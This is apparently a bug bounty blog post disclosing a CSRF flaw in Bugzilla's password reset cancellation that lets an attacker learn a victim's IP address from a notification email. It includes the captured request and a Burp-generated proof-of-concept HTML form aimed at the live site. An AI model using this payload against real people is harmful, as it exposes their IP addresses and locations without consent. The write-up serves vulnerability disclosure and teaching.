Information Disclosure on Mozilla | Bug Bounty

 

Overview

In this blog, I'll take you through a fascinating bug bounty report involving information disclosure on the password reset cancellation endpoint of Mozilla's Bugzilla platform. This case highlights how a seemingly low-severity vulnerability can have significant implications when its side effects are used strategically.


Vulnerability Summary

The reported issue allowed an attacker to obtain a victim's IP address through a CSRF (Cross-Site Request Forgery) attack on the password reset cancellation flow. The attacker first requests a password reset for their own account, which yields a cancellation form. When a victim opens a malicious page crafted by the attacker, the victim's browser submits that cancellation, and the attacker, as the owner of the account whose reset was canceled, receives the notification email containing the victim's IP address.

While IP addresses are not always treated as sensitive information, their disclosure can lead to privacy violations (approximate geolocation, linking a pseudonymous account to a network) or serve as a starting point for further attacks in certain scenarios.


Technical Details

  1. Affected Endpoint:
    The vulnerability was present in the password reset cancellation process (token.cgi with a=cxlpw) at https://bugzilla.mozilla.org.

  2. Exploitation Flow:

    • The attacker creates an account on the platform, requests a password reset for it, and observes the reset and cancellation workflow.
    • The attacker notices that when a password reset request is canceled, the platform emails the account owner a notice that includes the IP address of the client that submitted the cancellation.
    • The attacker captures the cancellation POST, whose cancel_token and t values they already hold because the reset is their own, and turns it into a CSRF payload that submits the same form from any visitor's browser.
  3. Proof-of-Concept (PoC):
    Here is the captured cancellation request and the CSRF payload generated from it:

    REQUEST:

    POST /token.cgi HTTP/2
    Host: bugzilla.mozilla.org
    Cookie: _ga=GA1.2.943165794.1724831061; _ga_PWTK27XVWP=GS1.1.1724884053.2.0.1724884053.0.0.0; _ga_MQ7767QQQW=GS1.1.1726224133.2.0.1726224133.0.0.0; _ga_B9CY1C9VBC=GS1.1.1727174575.2.1.1727174593.0.0.0; _gid=GA1.2.1127107875.1727130511
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 114
    Origin: http://burpsuite
    Referer: http://burpsuite/
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: cross-site
    Sec-Fetch-User: ?1
    Priority: u=0, i
    Te: trailers

    cancel_token=1727251240-UxKc4U5ThgrHPhWNJ323-fahjy5Pn05h5ZYb7OqG-SI&t=3XOIDGIRtcwC3icniucOlm&a=cxlpw&cancel=Cancel

     

    Two details of the captured request matter. The only cookies are Google Analytics ones; there is no Bugzilla session cookie, so the endpoint authorizes the cancellation purely from the cancel_token and t values in the body, which the attacker controls. And the request carries Origin: http://burpsuite together with Sec-Fetch-Site: cross-site, so the server evidently does not reject cross-origin form posts. Burp Suite's CSRF PoC generator turns the request into the following page:

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="https://bugzilla.mozilla.org/token.cgi" method="POST">
          <input type="hidden" name="cancel&#95;token" value="1727251240&#45;UxKc4U5ThgrHPhWNJ323&#45;fahjy5Pn05h5ZYb7OqG&#45;SI" />
          <input type="hidden" name="t" value="3XOIDGIRtcwC3icniucOlm" />
          <input type="hidden" name="a" value="cxlpw" />
          <input type="hidden" name="cancel" value="Cancel" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

     

     

  4. Impact:

    • The attacker sends the malicious link to the victim, tricking them into opening it.
    • When the page submits the form, Bugzilla processes the cancellation and sends the notification email to the attacker's address, since the attacker owns the account whose reset was requested.
    • The email records the address the form was submitted from, so the attacker learns the victim's IP address (the public address of the victim's client, or of their VPN or proxy egress if they use one).

Severity and Rationale

Initially, the vulnerability was classified as low severity due to the following:

  1. IP addresses are generally not regarded as highly sensitive.
  2. Most users have dynamic IPs, which change over time.
  3. An IP address alone does not provide significant leverage without additional context or vulnerabilities.

However, the reporter pointed out that Mozilla had previously accepted similar reports, which led to the report being reopened for further review.


Lessons Learned

  1. Persistence Pays Off:
    The researcher’s persistence in referencing prior reports and explaining the significance of the issue led to the reopening and eventual resolution of the bug.

  2. Low-Hanging Vulnerabilities Can Matter:
    Even low-severity issues, when contextualized properly, can warrant attention. Organizations should carefully assess the implications of such findings.

  3. The Power of CSRF:
    CSRF is usually thought of as forcing a state change on the victim's behalf. Here the state change itself (canceling the attacker's own reset) is harmless to the victim; the damage comes from the side effect, an email to the attacker that records who submitted the form. Any endpoint that logs or emails the submitter's IP address to a party the attacker can choose has the same property, even when a CSRF token is present, because the attacker is the legitimate holder of that token.

     
